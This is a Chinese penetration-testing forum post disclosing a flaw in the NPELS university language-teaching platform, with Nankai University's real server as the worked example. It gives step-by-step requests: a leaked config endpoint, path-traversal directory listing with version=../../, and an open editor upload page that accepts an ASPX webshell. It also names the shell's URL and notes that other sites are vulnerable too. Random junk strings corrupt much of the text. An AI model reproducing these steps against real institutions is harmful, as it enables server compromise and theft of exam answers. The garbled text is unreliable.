中国网络渗透测试联盟

标题: 新理念外语网络教学平台文件上传漏洞 [打印本页]

---

作者: admin    时间: 2012-12-4 11:10
标题: 新理念外语网络教学平台文件上传漏洞
好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中

详细说明：
' B" S5 s7 Y6 o0 \' w- `
. X0 E" S+ v, M  b$ A* d以南开大学的为例:
http://222.30.60.3/NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
9 i. `! C/ O4 Y  `- y, U<setting name="Update_CommonSvr_CommonService" serializeAs="String">
" ?% W; {: O7 g* C, E9 p) @<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
* R; y9 D8 g: T* Z% c! e( q" I% G</setting>
及版本号
3 f5 q) P. P! }<add key="TVersion" value="1, 0, 0, 2187">
, R- ?. W0 c( v; ]</add>
直接访问
+ B' V+ _1 ~7 i8 d8 J3 k- q: Chttp://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
, k  p! _% c, {4 r1 P4 _0 E5 s# V! \进一步列目录（返回的网页很大，可以直接 wget 下来）
- N8 S( m" q3 s9 X9 F( b) |7 D" Shttp://222.30.60.3/NPELS/CommonS ... List?version=../../
$ G" e( e- }* r9 V) K, R0 S
发现
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可
8 X2 f$ r# Q) \* F9 M' D/ h
0 m6 ~5 [2 T9 J: K# A! W8 k+ O7 M3 JOOXX
  r! |- [( }* |: g" ^9 t
Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
" {' \/ c) v/ m8 W) {' x漏洞证明：

) w+ U1 p* D4 _$ V2 w" e列目录：
: x4 {7 r0 A' O7 u1 [2 Rhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
http://222.30.60.3/npelsv/editor/editor.htm

" ]) `) N  O) M% Y  t1 l上传木马：
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
1 D9 {  m- C0 t9 n0 y# ]% A
- a- r* f) Y+ J" M( k7 ?2 S修复方案：
4 L6 g( K$ T6 ~" P好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2